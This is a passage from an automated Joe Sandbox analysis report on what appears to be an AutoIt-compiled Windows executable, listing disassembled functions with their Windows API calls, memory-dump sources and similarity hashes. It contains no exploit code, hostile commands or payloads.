                                                                                                                                • GetKeyboardState.USER32(?), ref: 00F5464D
                                                                                                                                • SetKeyboardState.USER32(?), ref: 00F546AE
                                                                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F546DA
                                                                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F546F7
                                                                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F5473B
                                                                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F5475C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 87235514-0
                                                                                                                                • Opcode ID: eb106a36ae50b11ed197a05c50e0782c7dbdfaafefcf29a677e515db361a0087
                                                                                                                                • Instruction ID: 41bdfc241caf3a81131eafe47f39207f1de83499f3f7250df7af15a054b18012
                                                                                                                                • Opcode Fuzzy Hash: eb106a36ae50b11ed197a05c50e0782c7dbdfaafefcf29a677e515db361a0087
                                                                                                                                • Instruction Fuzzy Hash: E051E5A09047D63DFB3687248C45BB6BE995B0631AF084589EAE4468C2D394FCDCF750
                                                                                                                                Function 00F586AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _wcsncpy$LocalTime
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2945705084-0
                                                                                                                                • Opcode ID: d527ff84a67dcb9831b14e4eae653303b6685e683dcc9388e039a3a847ba69a3
                                                                                                                                • Instruction ID: 836b1246399de2bc1009098180b3d254ff0bbd6453e190174d3c20be799110d2
                                                                                                                                • Opcode Fuzzy Hash: d527ff84a67dcb9831b14e4eae653303b6685e683dcc9388e039a3a847ba69a3
                                                                                                                                • Instruction Fuzzy Hash: A7417E75C1021475CB50EBF8CC86ACFB7ACEF08760F508866E915F3121EA38E255D7A5
                                                                                                                                Function 00F78DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00F78DF4
                                                                                                                                • GetWindowLongW.USER32(016C7528,000000F0), ref: 00F78E27
                                                                                                                                • GetWindowLongW.USER32(016C7528,000000F0), ref: 00F78E5C
                                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00F78E8E
                                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00F78EB8
                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00F78EC9
                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F78EE3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LongWindow$MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2178440468-0
                                                                                                                                • Opcode ID: eacc6279ecaf92840bcc9aaffd19c89ce5607611f5b26b0011e69970bd67023e
                                                                                                                                • Instruction ID: cf4ac2bed6fbdee22656e568bf366e4b59a6fb43d98a03aa1a0aecf39cc093ed
                                                                                                                                • Opcode Fuzzy Hash: eacc6279ecaf92840bcc9aaffd19c89ce5607611f5b26b0011e69970bd67023e
                                                                                                                                • Instruction Fuzzy Hash: 7E311931A80115EFDB21CF98DC88F5537A5FB497A4F158166F5098B2B2CB71A841FB42
                                                                                                                                Function 00F516F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F51734
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F5175A
                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00F5175D
                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00F5177B
                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00F51784
                                                                                                                                • StringFromGUID2.COMBASE(?,?,00000028), ref: 00F517A9
                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00F517B7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3761583154-0
                                                                                                                                • Opcode ID: 834aa33c0ed506329cf408a93622517ad70bb4b8d28f70f1fd9cfee13f34b90a
                                                                                                                                • Instruction ID: d4bc5295460354e6cfb5cbeeff8bed190d1770ed448d55cd1389fa4decf70f81
                                                                                                                                • Opcode Fuzzy Hash: 834aa33c0ed506329cf408a93622517ad70bb4b8d28f70f1fd9cfee13f34b90a
                                                                                                                                • Instruction Fuzzy Hash: A52186766002196F9B10DBACDC88DAA73ECFB0D3717508126FE15DB151D674EC459760
                                                                                                                                Function 00F52FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __wcsnicmp
                                                                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                • API String ID: 1038674560-2734436370
                                                                                                                                • Opcode ID: feed0ec98ae47447f5a78faf02449865178dadfed9c03119ab1b97931b3471ad
                                                                                                                                • Instruction ID: 976b3f3d18080915d150cde5440d2ab34d175c3f791160dd932ce017ce8ce446
                                                                                                                                • Opcode Fuzzy Hash: feed0ec98ae47447f5a78faf02449865178dadfed9c03119ab1b97931b3471ad
                                                                                                                                • Instruction Fuzzy Hash: 41214C3260431176C231F638AC02FBB73E89F563A5F504125FE56871C2EB959A86F391
                                                                                                                                Function 00F517C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F5180D
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F51833
                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00F51836
                                                                                                                                • SysAllocString.OLEAUT32 ref: 00F51857
                                                                                                                                • SysFreeString.OLEAUT32 ref: 00F51860
                                                                                                                                • StringFromGUID2.COMBASE(?,?,00000028), ref: 00F5187A
                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00F51888
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3761583154-0
                                                                                                                                • Opcode ID: b053264bd3127b06ec9bb317a429417f1665752ae6f677d87239e7870a6543e2
                                                                                                                                • Instruction ID: e3602ab43e6f5773077d6a0d76fa3ff704d9c4c1159c13436d83c5b5d74ba6b4
                                                                                                                                • Opcode Fuzzy Hash: b053264bd3127b06ec9bb317a429417f1665752ae6f677d87239e7870a6543e2
                                                                                                                                • Instruction Fuzzy Hash: 992165366001046F9B109BB8DC88EAA77ECFB09371B508126FA15DB261DA74EC459764
                                                                                                                                Function 00F7A0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F2C657
                                                                                                                                  • Part of subcall function 00F2C619: GetStockObject.GDI32(00000011), ref: 00F2C66B
                                                                                                                                  • Part of subcall function 00F2C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F2C675
                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F7A13B
                                                                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F7A148
                                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F7A153
                                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F7A162
                                                                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F7A16E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                • String ID: Msctls_Progress32
                                                                                                                                • API String ID: 1025951953-3636473452
                                                                                                                                • Opcode ID: f8fe87b6ce9b71fc4c93b5f08c04a568b38e9c4b63403f39f18630887ed6b4b9
                                                                                                                                • Instruction ID: 77a4611e0231d304212e39e9f23499f3f4031dfe1813cb9b2239151edc2b61cf
                                                                                                                                • Opcode Fuzzy Hash: f8fe87b6ce9b71fc4c93b5f08c04a568b38e9c4b63403f39f18630887ed6b4b9
                                                                                                                                • Instruction Fuzzy Hash: F31193B254011DBEFF118F60CC86EEB7F5DEF087A8F018115F608A6090C6769C21EBA0
                                                                                                                                Function 00F34C3D Relevance: 10.5, APIs: 7, Instructions: 47threadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • __getptd_noexit.LIBCMT ref: 00F34C3E
                                                                                                                                  • Part of subcall function 00F386B5: GetLastError.KERNEL32(?,00F30127,00F388A3,00F34673,?,?,00F30127,?,00F1125D,00000058,?,?), ref: 00F386B7
                                                                                                                                  • Part of subcall function 00F386B5: __calloc_crt.LIBCMT ref: 00F386D8
                                                                                                                                  • Part of subcall function 00F386B5: GetCurrentThreadId.KERNEL32 ref: 00F38701
                                                                                                                                  • Part of subcall function 00F386B5: SetLastError.KERNEL32(00000000,00F30127,00F388A3,00F34673,?,?,00F30127,?,00F1125D,00000058,?,?), ref: 00F38719
                                                                                                                                • CloseHandle.KERNEL32(?,?,00F34C1D), ref: 00F34C52
                                                                                                                                • __freeptd.LIBCMT ref: 00F34C59
                                                                                                                                • RtlExitUserThread.NTDLL(00000000,?,00F34C1D), ref: 00F34C61
                                                                                                                                • GetLastError.KERNEL32(?,?,00F34C1D), ref: 00F34C91
                                                                                                                                • RtlExitUserThread.NTDLL(00000000,?,?,00F34C1D), ref: 00F34C98
                                                                                                                                • __freefls@4.LIBCMT ref: 00F34CB4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1445074172-0
                                                                                                                                • Opcode ID: dff31088fc8084ad6863f405dce0e8fddca5d837e910f045a296f65ecef20c66
                                                                                                                                • Instruction ID: 66c5a2e27c6c46d3b55faddf9189c250099965ca76f29f641a3c04f4c3431d49
                                                                                                                                • Opcode Fuzzy Hash: dff31088fc8084ad6863f405dce0e8fddca5d837e910f045a296f65ecef20c66
                                                                                                                                • Instruction Fuzzy Hash: 5A01BC71801706ABC718BB74DD0A949BBA5EF443B5F248519F8188B252EF3CE842AA91
                                                                                                                                Function 00F2C697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetClientRect.USER32(?,?), ref: 00F2C6C0
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00F2C701
                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00F2C729
                                                                                                                                • GetClientRect.USER32(?,?), ref: 00F2C856
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00F2C86F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Rect$Client$Window$Screen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1296646539-0
                                                                                                                                • Opcode ID: 4d97e579099253dd4ae7866f418099b7c4403ace4a4c311109def1ed52b1b8bc
                                                                                                                                • Instruction ID: f9e4539d4b8de740b61d39545476ef9014c893d1ae5e3bad662211586501340d
                                                                                                                                • Opcode Fuzzy Hash: 4d97e579099253dd4ae7866f418099b7c4403ace4a4c311109def1ed52b1b8bc
                                                                                                                                • Instruction Fuzzy Hash: 8CB13B7A900249DBDF10CFA8C9807EDB7B1FF08710F14952AED59EB255DB70A940EBA4
                                                                                                                                Function 00F59569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memmove$__itow__swprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3253778849-0
                                                                                                                                • Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                                • Instruction ID: c5949a047ca41bd30187ec9a59207602089ad6b290fe42a165f393999ee75177
                                                                                                                                • Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                                                                                                                • Instruction Fuzzy Hash: 6861BE3151421A9BCB05EF60CD82EFE37B8AF48314F044455FD1A6B192EB78DD4AEB50
                                                                                                                                Function 00F71AD0 Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00F71B09
                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00F71B17
                                                                                                                                • __wsplitpath.LIBCMT ref: 00F71B45
                                                                                                                                  • Part of subcall function 00F3297D: __wsplitpath_helper.LIBCMT ref: 00F329BD
                                                                                                                                • _wcscat.LIBCMT ref: 00F71B5A
                                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00F71BD0
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00F71BE2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1380811348-0
                                                                                                                                • Opcode ID: bc0da3136a9c4f97f057d1727844430e20c5eb5c2db8314844bc2840482a8739
                                                                                                                                • Instruction ID: 87bd6ef71935aaa02751a3d91bacc68cf57a0f3557abbce5c80eb62220a1d5c5
                                                                                                                                • Opcode Fuzzy Hash: bc0da3136a9c4f97f057d1727844430e20c5eb5c2db8314844bc2840482a8739
                                                                                                                                • Instruction Fuzzy Hash: 7D517C72504300AFD310EF24DC85EABB7E8AF88754F14491EF58997251EB34EA44DBA2
                                                                                                                                Function 00F2DB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _wcscpy$_wcscat
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2037614760-0
                                                                                                                                • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                                • Instruction ID: 6d926a2949fb3c130ca0acb9ff65027cab853b05b4db00e97ae76fa652c8457a
                                                                                                                                • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                                • Instruction Fuzzy Hash: 5451F231D04135AACB15AF98E841AFDB3B4FF44720F90804AF580AB291DBB85F82F791
                                                                                                                                Function 00F52ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00F52AF6
                                                                                                                                • VariantClear.OLEAUT32(00000013), ref: 00F52B68
                                                                                                                                • VariantClear.OLEAUT32(00000000), ref: 00F52BC3
                                                                                                                                • _memmove.LIBCMT ref: 00F52BED
                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00F52C3A
                                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F52C68
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
